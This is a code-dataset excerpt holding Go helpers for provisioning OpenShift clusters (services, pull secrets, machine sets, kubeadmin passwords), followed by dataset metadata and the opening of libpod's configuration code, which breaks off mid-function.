svc.Name = "openshift-apiserver"
svc.Spec.Selector = map[string]string{"app": "openshift-apiserver"}
svc.Spec.Type = corev1.ServiceTypeClusterIP
svc.Spec.Ports = []corev1.ServicePort{
{
Name: "https",
Port: 443,
Protocol: corev1.ProtocolTCP,
TargetPort: intstr.FromInt(8443),
},
}
svc, err := client.CoreV1().Services(namespace).Create(svc)
if err != nil {
return "", err
}
return svc.Spec.ClusterIP, nil
}
func createOauthService(client kubeclient.Interface, namespace string) (int, error) {
svc := &corev1.Service{}
svc.Name = "oauth-openshift"
svc.Spec.Selector = map[string]string{"app": "oauth-openshift"}
svc.Spec.Type = corev1.ServiceTypeNodePort
svc.Spec.Ports = []corev1.ServicePort{
{
Name: "https",
Port: 443,
Protocol: corev1.ProtocolTCP,
TargetPort: intstr.FromInt(6443),
},
}
svc, err := client.CoreV1().Services(namespace).Create(svc)
if err != nil {
return 0, err
}
return int(svc.Spec.Ports[0].NodePort), nil
}
func createPullSecret(client kubeclient.Interface, namespace, data string) error {
secret := &corev1.Secret{}
secret.Name = "pull-secret"
secret.Data = map[string][]byte{".dockerconfigjson": []byte(data)}
secret.Type = corev1.SecretTypeDockerConfigJson
_, err := client.CoreV1().Secrets(namespace).Create(secret)
if err != nil {
return err
}
retry.RetryOnConflict(retry.DefaultRetry, func() error {
sa, err := client.CoreV1().ServiceAccounts(namespace).Get("default", metav1.GetOptions{})
if err != nil {
return err
}
sa.ImagePullSecrets = append(sa.ImagePullSecrets, corev1.LocalObjectReference{Name: "pull-secret"})
_, err = client.CoreV1().ServiceAccounts(namespace).Update(sa)
return err
})
return nil
}
func generateTargetPullSecret(data []byte, fileName string) error {
secret := &corev1.Secret{}
secret.Name = "pull-secret"
secret.Namespace = "openshift-config"
secret.Data = map[string][]byte{".dockerconfigjson": data}
secret.Type = corev1.SecretTypeDockerConfigJson
secretBytes, err := runtime.Encode(coreCodecs.LegacyCodec(corev1.SchemeGroupVersion), secret)
if err != nil {
return err
}
configMap := &corev1.ConfigMap{}
configMap.APIVersion = "v1"
configMap.Kind = "ConfigMap"
configMap.Name = "user-manifest-pullsecret"
configMap.Data = map[string]string{"data": string(secretBytes)}
configMapBytes, err := runtime.Encode(coreCodecs.LegacyCodec(corev1.SchemeGroupVersion), configMap)
if err != nil {
return err
}
return ioutil.WriteFile(fileName, configMapBytes, 0644)
}
func getPullSecret(client kubeclient.Interface) (string, error) {
secret, err := client.CoreV1().Secrets("openshift-config").Get("pull-secret", metav1.GetOptions{})
if err != nil {
return "", err
}
pullSecret, ok := secret.Data[".dockerconfigjson"]
if !ok {
return "", fmt.Errorf("did not find pull secret data in secret")
}
return string(pullSecret), nil
}
func getAWSCredentials(client kubeclient.Interface) (string, string, error) {
secret, err := client.CoreV1().Secrets("kube-system").Get("aws-creds", metav1.GetOptions{})
if err != nil {
return "", "", err
}
key, ok := secret.Data["aws_access_key_id"]
if !ok {
return "", "", fmt.Errorf("did not find an AWS access key")
}
secretKey, ok := secret.Data["aws_secret_access_key"]
if !ok {
return "", "", fmt.Errorf("did not find an AWS secret access key")
}
return string(key), string(secretKey), nil
}
func getMachineNames(client dynamic.Interface) ([]string, error) {
machineGroupVersion, err := schema.ParseGroupVersion("machine.openshift.io/v1beta1")
if err != nil {
return nil, err
}
machineGroupVersionResource := machineGroupVersion.WithResource("machines")
list, err := client.Resource(machineGroupVersionResource).Namespace("openshift-machine-api").List(metav1.ListOptions{})
if err != nil {
return nil, err
}
names := []string{}
for _, m := range list.Items {
names = append(names, m.GetName())
}
return names, nil
}
func getMachineInfo(client dynamic.Interface, machineNames []string, prefix string) (string, string, error) {
name := ""
for _, machineName := range machineNames {
if strings.HasPrefix(machineName, prefix) {
name = machineName
break
}
}
if name == "" {
return "", "", fmt.Errorf("did not find machine with prefix %s", prefix)
}
machineGroupVersion, err := schema.ParseGroupVersion("machine.openshift.io/v1beta1")
if err != nil {
return "", "", err
}
machineGroupVersionResource := machineGroupVersion.WithResource("machines")
machine, err := client.Resource(machineGroupVersionResource).Namespace("openshift-machine-api").Get(name, metav1.GetOptions{})
if err != nil {
return "", "", err
}
instanceID, exists, err := unstructured.NestedString(machine.Object, "status", "providerStatus", "instanceId")
if !exists || err != nil {
return "", "", fmt.Errorf("did not find instanceId on machine object: %v", err)
}
addresses, exists, err := unstructured.NestedSlice(machine.Object, "status", "addresses")
if !exists || err != nil {
return "", "", fmt.Errorf("did not find addresses on machine object: %v", err)
}
machineIP := ""
for _, addr := range addresses {
addrType, _, err := unstructured.NestedString(addr.(map[string]interface{}), "type")
if err != nil {
return "", "", fmt.Errorf("cannot get address type: %v", err)
}
if addrType != "InternalIP" {
continue
}
machineIP, _, err = unstructured.NestedString(addr.(map[string]interface{}), "address")
if err != nil {
return "", "", fmt.Errorf("cannot get machine address: %v", err)
}
}
if machineIP == "" {
return "", "", fmt.Errorf("could not find machine internal IP")
}
return instanceID, machineIP, nil
}
func getSSHPublicKey(client dynamic.Interface) ([]byte, error) {
machineConfigGroupVersion, err := schema.ParseGroupVersion("machineconfiguration.openshift.io/v1")
if err != nil {
return nil, err
}
machineConfigGroupVersionResource := machineConfigGroupVersion.WithResource("machineconfigs")
obj, err := client.Resource(machineConfigGroupVersionResource).Get("99-master-ssh", metav1.GetOptions{})
if err != nil {
return nil, err
}
obj.GetName()
users, exists, err := unstructured.NestedSlice(obj.Object, "spec", "config", "passwd", "users")
if !exists || err != nil {
return nil, fmt.Errorf("could not find users slice in ssh machine config: %v", err)
}
keys, exists, err := unstructured.NestedStringSlice(users[0].(map[string]interface{}), "sshAuthorizedKeys")
if !exists || err != nil {
return nil, fmt.Errorf("could not find authorized keys for machine config: %v", err)
}
return []byte(keys[0]), nil
}
func getInfrastructureInfo(client dynamic.Interface) (string, string, error) {
infraGroupVersion, err := schema.ParseGroupVersion("config.openshift.io/v1")
if err != nil {
return "", "", err
}
infraGroupVersionResource := infraGroupVersion.WithResource("infrastructures")
obj, err := client.Resource(infraGroupVersionResource).Get("cluster", metav1.GetOptions{})
if err != nil {
return "", "", err
}
infraName, exists, err := unstructured.NestedString(obj.Object, "status", "infrastructureName")
if !exists || err != nil {
return "", "", fmt.Errorf("could not find the infrastructure name in the infrastructure resource: %v", err)
}
region, exists, err := unstructured.NestedString(obj.Object, "status", "platformStatus", "aws", "region")
if !exists || err != nil {
return "", "", fmt.Errorf("could not find the AWS region in the infrastructure resource: %v", err)
}
return infraName, region, nil
}
func getDNSZoneInfo(client dynamic.Interface) (string, string, error) {
configGroupVersion, err := schema.ParseGroupVersion("config.openshift.io/v1")
if err != nil {
return "", "", err
}
dnsGroupVersionResource := configGroupVersion.WithResource("dnses")
obj, err := client.Resource(dnsGroupVersionResource).Get("cluster", metav1.GetOptions{})
if err != nil {
return "", "", err
}
publicZoneID, exists, err := unstructured.NestedString(obj.Object, "spec", "publicZone", "id")
if !exists || err != nil {
return "", "", fmt.Errorf("could not find the dns public zone id in the dns resource: %v", err)
}
domain, exists, err := unstructured.NestedString(obj.Object, "spec", "baseDomain")
if !exists || err != nil {
return "", "", fmt.Errorf("could not find the dns base domain in the dns resource: %v", err)
}
parts := strings.Split(domain, ".")
baseDomain := strings.Join(parts[1:], ".")
return publicZoneID, baseDomain, nil
}
// loadConfig loads a REST Config as per the rules specified in GetConfig
func loadConfig() (*rest.Config, error) {
if len(os.Getenv("KUBECONFIG")) > 0 {
return clientcmd.BuildConfigFromFlags("", os.Getenv("KUBECONFIG"))
}
if c, err := rest.InClusterConfig(); err == nil {
return c, nil
}
if usr, err := user.Current(); err == nil {
if c, err := clientcmd.BuildConfigFromFlags(
"", filepath.Join(usr.HomeDir, ".kube", "config")); err == nil {
return c, nil
}
}
return nil, fmt.Errorf("could not locate a kubeconfig")
}
func getReleaseImage(client dynamic.Interface) (string, error) {
configGroupVersion, err := schema.ParseGroupVersion("config.openshift.io/v1")
if err != nil {
return "", err
}
clusterVersionGVR := configGroupVersion.WithResource("clusterversions")
obj, err := client.Resource(clusterVersionGVR).Get("version", metav1.GetOptions{})
if err != nil {
return "", err
}
releaseImage, exists, err := unstructured.NestedString(obj.Object, "status", "desired", "image")
if !exists || err != nil {
return "", fmt.Errorf("cannot find release image in cluster version resource")
}
return releaseImage, nil
}
func getNetworkInfo(client dynamic.Interface) (string, string, error) {
configGroupVersion, err := schema.ParseGroupVersion("config.openshift.io/v1")
if err != nil {
return "", "", err
}
networkGroupVersionResource := configGroupVersion.WithResource("networks")
obj, err := client.Resource(networkGroupVersionResource).Get("cluster", metav1.GetOptions{})
if err != nil {
return "", "", err
}
serviceNetworks, exists, err := unstructured.NestedSlice(obj.Object, "status", "serviceNetwork")
if !exists || err != nil || len(serviceNetworks) == 0 {
return "", "", fmt.Errorf("could not find service networks in the network status: %v", err)
}
serviceCIDR := serviceNetworks[0].(string)
podNetworks, exists, err := unstructured.NestedSlice(obj.Object, "status", "clusterNetwork")
if !exists || err != nil || len(podNetworks) == 0 {
return "", "", fmt.Errorf("could not find cluster networks in the network status: %v", err)
}
podCIDR, exists, err := unstructured.NestedString(podNetworks[0].(map[string]interface{}), "cidr")
if !exists || err != nil {
return "", "", fmt.Errorf("cannot find cluster network cidr: %v", err)
}
return serviceCIDR, podCIDR, nil
}
func generateWorkerMachineset(client dynamic.Interface, infraName, zone, namespace, lbName, fileName string) error {
machineGV, err := schema.ParseGroupVersion("machine.openshift.io/v1beta1")
if err != nil {
return err
}
machineSetGVR := machineGV.WithResource("machinesets")
obj, err := client.Resource(machineSetGVR).Namespace("openshift-machine-api").Get(fmt.Sprintf("%s-worker-%s", infraName, zone), metav1.GetOptions{})
if err != nil {
return err
}
workerName := generateMachineSetName(infraName, namespace, "worker")
object := obj.Object
unstructured.RemoveNestedField(object, "status")
unstructured.RemoveNestedField(object, "metadata", "creationTimestamp")
unstructured.RemoveNestedField(object, "metadata", "generation")
unstructured.RemoveNestedField(object, "metadata", "resourceVersion")
unstructured.RemoveNestedField(object, "metadata", "selfLink")
unstructured.RemoveNestedField(object, "metadata", "uid")
unstructured.RemoveNestedField(object, "spec", "template", "spec", "metadata")
unstructured.RemoveNestedField(object, "spec", "template", "spec", "providerSpec", "value", "publicIp")
unstructured.SetNestedField(object, int64(workerMachineSetCount), "spec", "replicas")
unstructured.SetNestedField(object, workerName, "metadata", "name")
unstructured.SetNestedField(object, workerName, "spec", "selector", "matchLabels", "machine.openshift.io/cluster-api-machineset")
unstructured.SetNestedField(object, workerName, "spec", "template", "metadata", "labels", "machine.openshift.io/cluster-api-machineset")
unstructured.SetNestedField(object, fmt.Sprintf("%s-user-data", namespace), "spec", "template", "spec", "providerSpec", "value", "userDataSecret", "name")
loadBalancer := map[string]interface{}{}
unstructured.SetNestedField(loadBalancer, lbName, "name")
unstructured.SetNestedField(loadBalancer, "network", "type")
loadBalancers := []interface{}{loadBalancer}
unstructured.SetNestedSlice(object, loadBalancers, "spec", "template", "spec", "providerSpec", "value", "loadBalancers")
machineSetBytes, err := json.Marshal(object)
if err != nil {
return err
}
return ioutil.WriteFile(fileName, machineSetBytes, 0644)
}
func generateUserDataSecret(namespace, bucketName, fileName string) error {
secret := &corev1.Secret{}
secret.Kind = "Secret"
secret.APIVersion = "v1"
secret.Name = fmt.Sprintf("%s-user-data", namespace)
secret.Namespace = "openshift-machine-api"
disableTemplatingValue := []byte(base64.StdEncoding.EncodeToString([]byte("true")))
userDataValue := []byte(fmt.Sprintf(`{"ignition":{"config":{"append":[{"source":"https://%s.s3.amazonaws.com/worker.ign","verification":{}}]},"security":{},"timeouts":{},"version":"2.2.0"},"networkd":{},"passwd":{},"storage":{},"systemd":{}}`, bucketName))
secret.Data = map[string][]byte{
"disableTemplating": disableTemplatingValue,
"userData": userDataValue,
}
secretBytes, err := json.Marshal(secret)
if err != nil {
return err
}
return ioutil.WriteFile(fileName, secretBytes, 0644)
}
func copyFile(src, dest string) error {
in, err := os.Open(src)
if err != nil {
return err
}
defer in.Close()
out, err := os.Create(dest)
if err != nil {
return err
}
defer out.Close()
_, err = io.Copy(out, in)
return err
}
func ensurePrivilegedSCC(client dynamic.Interface, namespace string) error {
securityGV, err := schema.ParseGroupVersion("security.openshift.io/v1")
if err != nil {
return err
}
sccGVR := securityGV.WithResource("securitycontextconstraints")
obj, err := client.Resource(sccGVR).Get("privileged", metav1.GetOptions{})
if err != nil {
return err
}
users, exists, err := unstructured.NestedStringSlice(obj.Object, "users")
if err != nil {
return err
}
userSet := sets.NewString()
if exists {
userSet.Insert(users...)
}
svcAccount := fmt.Sprintf("system:serviceaccount:%s:default", namespace)
if userSet.Has(svcAccount) {
// No need to update anything, service account already has privileged SCC
return nil
}
userSet.Insert(svcAccount)
if err = unstructured.SetNestedStringSlice(obj.Object, userSet.List(), "users"); err != nil {
return err
}
_, err = client.Resource(sccGVR).Update(obj, metav1.UpdateOptions{})
return err
}
func generateKubeadminPasswordTargetSecret(password string, fileName string) error {
secret := &corev1.Secret{}
secret.APIVersion = "v1"
secret.Kind = "Secret"
secret.Name = "kubeadmin"
secret.Namespace = "kube-system"
passwordHash, err := bcrypt.GenerateFromPassword([]byte(password), bcrypt.DefaultCost)
if err != nil {
return err
}
secret.Data = map[string][]byte{"kubeadmin": passwordHash}
secretBytes, err := runtime.Encode(coreCodecs.LegacyCodec(corev1.SchemeGroupVersion), secret)
if err != nil {
return err
}
configMap := &corev1.ConfigMap{}
configMap.APIVersion = "v1"
configMap.Kind = "ConfigMap"
configMap.Name = "user-manifest-kubeadmin-password"
configMap.Data = map[string]string{"data": string(secretBytes)}
configMapBytes, err := runtime.Encode(coreCodecs.LegacyCodec(corev1.SchemeGroupVersion), configMap)
if err != nil {
return err
}
return ioutil.WriteFile(fileName, configMapBytes, 0644)
}
func generateKubeadminPasswordSecret(password string, fileName string) error {
secret := &corev1.Secret{}
secret.APIVersion = "v1"
secret.Kind = "Secret"
secret.Name = "kubeadmin-password"
secret.Data = map[string][]byte{"password": []byte(password)}
secretBytes, err := runtime.Encode(coreCodecs.LegacyCodec(corev1.SchemeGroupVersion), secret)
if err != nil {
return err
}
return ioutil.WriteFile(fileName, secretBytes, 0644)
}
func generateKubeconfigSecret(kubeconfigFile, manifestFilename string) error {
secret := &corev1.Secret{}
secret.APIVersion = "v1"
secret.Kind = "Secret"
secret.Name = "admin-kubeconfig"
kubeconfigBytes, err := ioutil.ReadFile(kubeconfigFile)
if err != nil {
return err
}
secret.Data = map[string][]byte{"kubeconfig": kubeconfigBytes}
secretBytes, err := runtime.Encode(coreCodecs.LegacyCodec(corev1.SchemeGroupVersion), secret)
if err != nil {
return err
}
return ioutil.WriteFile(manifestFilename, secretBytes, 0644)
}
func updateOAuthDeployment(client kubeclient.Interface, namespace string) error {
d, err := client.AppsV1().Deployments(namespace).Get("oauth-openshift", metav1.GetOptions{})
if err != nil {
return err
}
annotations := d.Spec.Template.ObjectMeta.Annotations
if annotations == nil {
annotations = map[string]string{}
}
annotations["deployment-refresh"] = fmt.Sprintf("%v", time.Now())
d.Spec.Template.ObjectMeta.Annotations = annotations
_, err = client.AppsV1().Deployments(namespace).Update(d)
return err
}
func generateImageRegistrySecret() string {
num := make([]byte, 64)
rand.Read(num)
return hex.EncodeToString(num)
}
func generateKubeadminPassword() (string, error) {
const (
lowerLetters = "abcdefghijkmnopqrstuvwxyz"
upperLetters = "ABCDEFGHIJKLMNPQRSTUVWXYZ"
digits = "23456789"
all = lowerLetters + upperLetters + digits
length = 23
)
var password string
for i := 0; i < length; i++ {
n, err := crand.Int(crand.Reader, big.NewInt(int64(len(all))))
if err != nil {
return "", err
}
newchar := string(all[n.Int64()])
if password == "" {
password = newchar
}
if i < length-1 {
n, err = crand.Int(crand.Reader, big.NewInt(int64(len(password)+1)))
if err != nil {
return "", err
}
j := n.Int64()
password = password[0:j] + newchar + password[j:]
}
}
pw := []rune(password)
for _, replace := range []int{5, 11, 17} {
pw[replace] = '-'
}
return string(pw), nil
}
func getTargetClusterConfig(pkiDir string) (*rest.Config, error) {
return clientcmd.BuildConfigFromFlags("", filepath.Join(pkiDir, "admin.kubeconfig"))
}
func generateLBResourceName(infraName, clusterName, suffix string) string {
return getName(fmt.Sprintf("%s-%s", infraName, clusterName), suffix, 32)
}
func generateBucketName(infraName, clusterName, suffix string) string {
return getName(fmt.Sprintf("%s-%s", infraName, clusterName), suffix, 63)
}
func generateMachineSetName(infraName, clusterName, suffix string) string {
return getName(fmt.Sprintf("%s-%s", infraName, clusterName), suffix, 43)
}
// getName returns a name given a base ("deployment-5") and a suffix ("deploy")
// It will first attempt to join them with a dash. If the resulting name is longer
// than maxLength: if the suffix is too long, it will truncate the base name and add
// an 8-character hash of the [base]-[suffix] string. If the suffix is not too long,
// it will truncate the base, add the hash of the base and return [base]-[hash]-[suffix]
func getName(base, suffix string, maxLength int) string {
if maxLength <= 0 {
return ""
}
name := fmt.Sprintf("%s-%s", base, suffix)
if len(name) <= maxLength {
return name
}
baseLength := maxLength - 10 /*length of -hash-*/ - len(suffix)
// if the suffix is too long, ignore it
if baseLength < 0 {
prefix := base[0:min(len(base), max(0, maxLength-9))]
// Calculate hash on initial base-suffix string
shortName := fmt.Sprintf("%s-%s", prefix, hash(name))
return shortName[:min(maxLength, len(shortName))]
}
prefix := base[0:baseLength]
// Calculate hash on initial base-suffix string
return fmt.Sprintf("%s-%s-%s", prefix, hash(base), suffix)
}
// max returns the greater of its 2 inputs
func max(a, b int) int {
if b > a {
return b
}
return a
}
// min returns the lesser of its 2 inputs
func min(a, b int) int {
if b < a {
return b
}
return a
}
// hash calculates the hexadecimal representation (8-chars)
// of the hash of the passed in string using the FNV-a algorithm
func hash(s string) string {
hash := fnv.New32a()
hash.Write([]byte(s))
intHash := hash.Sum32()
result := fmt.Sprintf("%08x", intHash)
return result
}
|
[
"\"KUBECONFIG\"",
"\"KUBECONFIG\""
] |
[] |
[
"KUBECONFIG"
] |
[]
|
["KUBECONFIG"]
|
go
| 1 | 0 | |
libpod/config/config.go
|
package config
import (
"bytes"
"io/ioutil"
"os"
"os/exec"
"path/filepath"
"regexp"
"strconv"
"strings"
"github.com/BurntSushi/toml"
"github.com/containers/libpod/libpod/define"
"github.com/containers/libpod/pkg/cgroups"
"github.com/containers/libpod/pkg/rootless"
"github.com/containers/libpod/pkg/util"
"github.com/containers/storage"
"github.com/pkg/errors"
"github.com/sirupsen/logrus"
)
const (
// _defaultTransport is a prefix that we apply to an image name to check
// docker hub first for the image.
_defaultTransport = "docker://"
// _rootlessConfigPath is the path to the rootless libpod.conf in $HOME.
_rootlessConfigPath = ".config/containers/libpod.conf"
// _conmonMinMajorVersion is the major version required for conmon.
_conmonMinMajorVersion = 2
// _conmonMinMinorVersion is the minor version required for conmon.
_conmonMinMinorVersion = 0
// _conmonMinPatchVersion is the sub-minor version required for conmon.
_conmonMinPatchVersion = 1
// _conmonVersionFormatErr is used when the expected versio-format of conmon
// has changed.
_conmonVersionFormatErr = "conmon version changed format"
// InstallPrefix is the prefix where podman will be installed.
// It can be overridden at build time.
_installPrefix = "/usr"
// EtcDir is the sysconfdir where podman should look for system config files.
// It can be overridden at build time.
_etcDir = "/etc"
// SeccompDefaultPath defines the default seccomp path.
SeccompDefaultPath = _installPrefix + "/share/containers/seccomp.json"
// SeccompOverridePath if this exists it overrides the default seccomp path.
SeccompOverridePath = _etcDir + "/crio/seccomp.json"
// _rootConfigPath is the path to the libpod configuration file
// This file is loaded to replace the builtin default config before
// runtime options (e.g. WithStorageConfig) are applied.
// If it is not present, the builtin default config is used instead
// This path can be overridden when the runtime is created by using
// NewRuntimeFromConfig() instead of NewRuntime().
_rootConfigPath = _installPrefix + "/share/containers/libpod.conf"
// _rootOverrideConfigPath is the path to an override for the default libpod
// configuration file. If OverrideConfigPath exists, it will be used in
// place of the configuration file pointed to by ConfigPath.
_rootOverrideConfigPath = _etcDir + "/containers/libpod.conf"
)
// SetOptions contains a subset of options in a Config. It's used to indicate if
// a given option has either been set by the user or by a parsed libpod
// configuration file. If not, the corresponding option might be overwritten by
// values from the database. This behavior guarantess backwards compat with
// older version of libpod and Podman.
type SetOptions struct {
// StorageConfigRunRootSet indicates if the RunRoot has been explicitly set
// by the config or by the user. It's required to guarantee backwards
// compatibility with older versions of libpod for which we must query the
// database configuration. Not included in the on-disk config.
StorageConfigRunRootSet bool `toml:"-"`
// StorageConfigGraphRootSet indicates if the RunRoot has been explicitly
// set by the config or by the user. It's required to guarantee backwards
// compatibility with older versions of libpod for which we must query the
// database configuration. Not included in the on-disk config.
StorageConfigGraphRootSet bool `toml:"-"`
// StorageConfigGraphDriverNameSet indicates if the GraphDriverName has been
// explicitly set by the config or by the user. It's required to guarantee
// backwards compatibility with older versions of libpod for which we must
// query the database configuration. Not included in the on-disk config.
StorageConfigGraphDriverNameSet bool `toml:"-"`
// VolumePathSet indicates if the VolumePath has been explicitly set by the
// config or by the user. It's required to guarantee backwards compatibility
// with older versions of libpod for which we must query the database
// configuration. Not included in the on-disk config.
VolumePathSet bool `toml:"-"`
// StaticDirSet indicates if the StaticDir has been explicitly set by the
// config or by the user. It's required to guarantee backwards compatibility
// with older versions of libpod for which we must query the database
// configuration. Not included in the on-disk config.
StaticDirSet bool `toml:"-"`
// TmpDirSet indicates if the TmpDir has been explicitly set by the config
// or by the user. It's required to guarantee backwards compatibility with
// older versions of libpod for which we must query the database
// configuration. Not included in the on-disk config.
TmpDirSet bool `toml:"-"`
}
// Config contains configuration options used to set up a libpod runtime
type Config struct {
// NOTE: when changing this struct, make sure to update (*Config).Merge().
// SetOptions contains a subset of config options. It's used to indicate if
// a given option has either been set by the user or by a parsed libpod
// configuration file. If not, the corresponding option might be
// overwritten by values from the database. This behavior guarantess
// backwards compat with older version of libpod and Podman.
SetOptions
// StateType is the type of the backing state store. Avoid using multiple
// values for this with the same containers/storage configuration on the
// same system. Different state types do not interact, and each will see a
// separate set of containers, which may cause conflicts in
// containers/storage. As such this is not exposed via the config file.
StateType define.RuntimeStateStore `toml:"-"`
// StorageConfig is the configuration used by containers/storage Not
// included in the on-disk config, use the dedicated containers/storage
// configuration file instead.
StorageConfig storage.StoreOptions `toml:"-"`
// VolumePath is the default location that named volumes will be created
// under. This convention is followed by the default volume driver, but
// may not be by other drivers.
VolumePath string `toml:"volume_path,omitempty"`
// ImageDefaultTransport is the default transport method used to fetch
// images.
ImageDefaultTransport string `toml:"image_default_transport,omitempty"`
// SignaturePolicyPath is the path to a signature policy to use for
// validating images. If left empty, the containers/image default signature
// policy will be used.
SignaturePolicyPath string `toml:"signature_policy_path,omitempty"`
// OCIRuntime is the OCI runtime to use.
OCIRuntime string `toml:"runtime,omitempty"`
// OCIRuntimes are the set of configured OCI runtimes (default is runc).
OCIRuntimes map[string][]string `toml:"runtimes,omitempty"`
// RuntimeSupportsJSON is the list of the OCI runtimes that support
// --format=json.
RuntimeSupportsJSON []string `toml:"runtime_supports_json,omitempty"`
// RuntimeSupportsNoCgroups is a list of OCI runtimes that support
// running containers without CGroups.
RuntimeSupportsNoCgroups []string `toml:"runtime_supports_nocgroups,omitempty"`
// RuntimePath is the path to OCI runtime binary for launching containers.
// The first path pointing to a valid file will be used This is used only
// when there are no OCIRuntime/OCIRuntimes defined. It is used only to be
// backward compatible with older versions of Podman.
RuntimePath []string `toml:"runtime_path,omitempty"`
// ConmonPath is the path to the Conmon binary used for managing containers.
// The first path pointing to a valid file will be used.
ConmonPath []string `toml:"conmon_path,omitempty"`
// ConmonEnvVars are environment variables to pass to the Conmon binary
// when it is launched.
ConmonEnvVars []string `toml:"conmon_env_vars,omitempty"`
// CGroupManager is the CGroup Manager to use Valid values are "cgroupfs"
// and "systemd".
CgroupManager string `toml:"cgroup_manager,omitempty"`
// InitPath is the path to the container-init binary.
InitPath string `toml:"init_path,omitempty"`
// StaticDir is the path to a persistent directory to store container
// files.
StaticDir string `toml:"static_dir,omitempty"`
// TmpDir is the path to a temporary directory to store per-boot container
// files. Must be stored in a tmpfs.
TmpDir string `toml:"tmp_dir,omitempty"`
// MaxLogSize is the maximum size of container logfiles.
MaxLogSize int64 `toml:"max_log_size,omitempty"`
// NoPivotRoot sets whether to set no-pivot-root in the OCI runtime.
NoPivotRoot bool `toml:"no_pivot_root,omitempty"`
// CNIConfigDir sets the directory where CNI configuration files are
// stored.
CNIConfigDir string `toml:"cni_config_dir,omitempty"`
// CNIPluginDir sets a number of directories where the CNI network
// plugins can be located.
CNIPluginDir []string `toml:"cni_plugin_dir,omitempty"`
// CNIDefaultNetwork is the network name of the default CNI network
// to attach pods to.
CNIDefaultNetwork string `toml:"cni_default_network,omitempty"`
// HooksDir holds paths to the directories containing hooks
// configuration files. When the same filename is present in in
// multiple directories, the file in the directory listed last in
// this slice takes precedence.
HooksDir []string `toml:"hooks_dir,omitempty"`
// DefaultMountsFile is the path to the default mounts file for testing
// purposes only.
DefaultMountsFile string `toml:"-"`
// Namespace is the libpod namespace to use. Namespaces are used to create
// scopes to separate containers and pods in the state. When namespace is
// set, libpod will only view containers and pods in the same namespace. All
// containers and pods created will default to the namespace set here. A
// namespace of "", the empty string, is equivalent to no namespace, and all
// containers and pods will be visible. The default namespace is "".
Namespace string `toml:"namespace,omitempty"`
// InfraImage is the image a pod infra container will use to manage
// namespaces.
InfraImage string `toml:"infra_image,omitempty"`
// InfraCommand is the command run to start up a pod infra container.
InfraCommand string `toml:"infra_command,omitempty"`
// EnablePortReservation determines whether libpod will reserve ports on the
// host when they are forwarded to containers. When enabled, when ports are
// forwarded to containers, they are held open by conmon as long as the
// container is running, ensuring that they cannot be reused by other
// programs on the host. However, this can cause significant memory usage if
// a container has many ports forwarded to it. Disabling this can save
// memory.
EnablePortReservation bool `toml:"enable_port_reservation,omitempty"`
// EnableLabeling indicates whether libpod will support container labeling.
EnableLabeling bool `toml:"label,omitempty"`
// NetworkCmdPath is the path to the slirp4netns binary.
NetworkCmdPath string `toml:"network_cmd_path,omitempty"`
// NumLocks is the number of locks to make available for containers and
// pods.
NumLocks uint32 `toml:"num_locks,omitempty"`
// LockType is the type of locking to use.
LockType string `toml:"lock_type,omitempty"`
// EventsLogger determines where events should be logged.
EventsLogger string `toml:"events_logger,omitempty"`
// EventsLogFilePath is where the events log is stored.
EventsLogFilePath string `toml:"events_logfile_path,omitempty"`
//DetachKeys is the sequence of keys used to detach a container.
DetachKeys string `toml:"detach_keys,omitempty"`
// SDNotify tells Libpod to allow containers to notify the host systemd of
// readiness using the SD_NOTIFY mechanism.
SDNotify bool `toml:",omitempty"`
// CgroupCheck indicates the configuration has been rewritten after an
// upgrade to Fedora 31 to change the default OCI runtime for cgroupsv2.
CgroupCheck bool `toml:"cgroup_check,omitempty"`
}
// DBConfig is a set of Libpod runtime configuration settings that are saved in
// a State when it is first created, and can subsequently be retrieved.
type DBConfig struct {
LibpodRoot string
LibpodTmp string
StorageRoot string
StorageTmp string
GraphDriver string
VolumePath string
}
// readConfigFromFile reads the specified config file at `path` and attempts to
// unmarshal its content into a Config.
func readConfigFromFile(path string) (*Config, error) {
var config Config
configBytes, err := ioutil.ReadFile(path)
if err != nil {
return nil, err
}
logrus.Debugf("Reading configuration file %q", path)
err = toml.Unmarshal(configBytes, &config)
// For the sake of backwards compat we need to check if the config fields
// with *Set suffix are set in the config. Note that the storage-related
// fields are NOT set in the config here but in the storage.conf OR directly
// by the user.
if config.VolumePath != "" {
config.VolumePathSet = true
}
if config.StaticDir != "" {
config.StaticDirSet = true
}
if config.TmpDir != "" {
config.TmpDirSet = true
}
return &config, err
}
// Write decodes the config as TOML and writes it to the specified path.
func (c *Config) Write(path string) error {
f, err := os.OpenFile(path, os.O_RDWR|os.O_CREATE, 0666)
if err != nil {
return errors.Wrapf(err, "error opening config file %q", path)
}
buffer := new(bytes.Buffer)
if err := toml.NewEncoder(buffer).Encode(c); err != nil {
return errors.Wrapf(err, "error encoding config")
}
if _, err := f.WriteString(buffer.String()); err != nil {
return errors.Wrapf(err, "error writing config %q", path)
}
return err
}
// FindConmon iterates over (*Config).ConmonPath and returns the path to first
// (version) matching conmon binary. If non is found, we try to do a path lookup
// of "conmon".
func (c *Config) FindConmon() (string, error) {
foundOutdatedConmon := false
for _, path := range c.ConmonPath {
stat, err := os.Stat(path)
if err != nil {
continue
}
if stat.IsDir() {
continue
}
if err := probeConmon(path); err != nil {
logrus.Warnf("Conmon at %s invalid: %v", path, err)
foundOutdatedConmon = true
continue
}
logrus.Debugf("Using conmon: %q", path)
return path, nil
}
// Search the $PATH as last fallback
if path, err := exec.LookPath("conmon"); err == nil {
if err := probeConmon(path); err != nil {
logrus.Warnf("Conmon at %s is invalid: %v", path, err)
foundOutdatedConmon = true
} else {
logrus.Debugf("Using conmon from $PATH: %q", path)
return path, nil
}
}
if foundOutdatedConmon {
return "", errors.Wrapf(define.ErrConmonOutdated,
"please update to v%d.%d.%d or later",
_conmonMinMajorVersion, _conmonMinMinorVersion, _conmonMinPatchVersion)
}
return "", errors.Wrapf(define.ErrInvalidArg,
"could not find a working conmon binary (configured options: %v)",
c.ConmonPath)
}
// probeConmon calls conmon --version and verifies it is a new enough version for
// the runtime expectations podman currently has.
func probeConmon(conmonBinary string) error {
cmd := exec.Command(conmonBinary, "--version")
var out bytes.Buffer
cmd.Stdout = &out
err := cmd.Run()
if err != nil {
return err
}
r := regexp.MustCompile(`^conmon version (?P<Major>\d+).(?P<Minor>\d+).(?P<Patch>\d+)`)
matches := r.FindStringSubmatch(out.String())
if len(matches) != 4 {
return errors.Wrap(err, _conmonVersionFormatErr)
}
major, err := strconv.Atoi(matches[1])
if err != nil {
return errors.Wrap(err, _conmonVersionFormatErr)
}
if major < _conmonMinMajorVersion {
return define.ErrConmonOutdated
}
if major > _conmonMinMajorVersion {
return nil
}
minor, err := strconv.Atoi(matches[2])
